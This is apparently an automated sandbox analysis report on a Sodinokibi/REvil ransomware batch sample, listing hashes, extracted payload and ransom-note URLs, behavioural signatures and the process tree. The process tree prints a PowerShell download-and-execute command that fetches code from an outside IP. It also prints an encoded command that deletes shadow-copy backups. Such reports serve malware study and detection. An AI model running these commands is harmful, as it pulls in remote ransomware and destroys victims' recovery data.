Analysis
-
max time kernel
140s -
max time network
35s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
21-05-2020 14:10
Static task
static1
Behavioral task
behavioral1
Sample
29ec9038cabce56dc3ae0d2ee20d9ed1.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
29ec9038cabce56dc3ae0d2ee20d9ed1.bat
Resource
win10v200430
General
-
Target
29ec9038cabce56dc3ae0d2ee20d9ed1.bat
-
Size
218B
-
MD5
b85f82f85e6208e52b6c015cd92e274d
-
SHA1
367648ab3b293615c8b98a358c8b0cf5cf69950a
-
SHA256
6d611f64b2ac03203102331de336feb8d67ea6e9f258e1b245614e239dd1df80
-
SHA512
15ee6c6c54e1ccaaf594adc6cf271634684669c55dfe1a853429f374fe2eb53b92642c373a0836b3e55f98c2b7bc874b0ad5cf650a593811173ae7bd2a567e12
Malware Config
Extracted
http://185.103.242.78/pastes/29ec9038cabce56dc3ae0d2ee20d9ed1
Extracted
C:\i449h0d19-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB
http://decryptor.cc/B5220888DF7426CB
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 868 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1520 wrote to memory of 868 1520 cmd.exe powershell.exe PID 868 wrote to memory of 1804 868 powershell.exe powershell.exe PID 868 wrote to memory of 1804 868 powershell.exe powershell.exe PID 868 wrote to memory of 1804 868 powershell.exe powershell.exe PID 868 wrote to memory of 1804 868 powershell.exe powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 868 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a0i0y6v3n4.bmp" powershell.exe -
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\i449h0d19-readme.txt powershell.exe File opened for modification \??\c:\program files\ClearUnlock.snd powershell.exe File opened for modification \??\c:\program files\ConvertFromCompare.aiff powershell.exe File created \??\c:\program files\microsoft sql server compact edition\i449h0d19-readme.txt powershell.exe File opened for modification \??\c:\program files\RenameSplit.gif powershell.exe File opened for modification \??\c:\program files\SkipExpand.ttc powershell.exe File opened for modification \??\c:\program files\WatchLimit.jpeg powershell.exe File created \??\c:\program files\i449h0d19-readme.txt powershell.exe File opened for modification \??\c:\program files\CloseCompare.001 powershell.exe File opened for modification \??\c:\program files\DenyAssert.3gp2 powershell.exe File opened for modification \??\c:\program files\InitializeSubmit.vstm powershell.exe File opened for modification \??\c:\program files\RedoRestart.asf powershell.exe File opened for modification \??\c:\program files\RegisterGet.mp4 powershell.exe File opened for modification \??\c:\program files\WatchSync.vb powershell.exe File opened for modification \??\c:\program files\CheckpointNew.pcx powershell.exe File opened for modification \??\c:\program files\DebugConnect.shtml powershell.exe File opened for modification \??\c:\program files\MergePop.gif powershell.exe File opened for modification \??\c:\program files\MountCopy.docx powershell.exe File opened for modification \??\c:\program files\ProtectRevoke.xla powershell.exe File opened for modification \??\c:\program files\PushPop.MTS powershell.exe File opened for modification \??\c:\program files\SyncExit.TS powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\i449h0d19-readme.txt powershell.exe File opened for modification \??\c:\program files\NewMount.3gpp powershell.exe File opened for modification \??\c:\program files\UnblockExpand.dot powershell.exe File opened for modification \??\c:\program files\UseWait.mpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\i449h0d19-readme.txt powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeBackupPrivilege 464 vssvc.exe Token: SeRestorePrivilege 464 vssvc.exe Token: SeAuditPrivilege 464 vssvc.exe Token: SeTakeOwnershipPrivilege 868 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 868 powershell.exe 868 powershell.exe 868 powershell.exe 1804 powershell.exe 1804 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe 868 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\29ec9038cabce56dc3ae0d2ee20d9ed1.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/29ec9038cabce56dc3ae0d2ee20d9ed1');Invoke-PYPLANTTDQA;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:868 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1804
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:464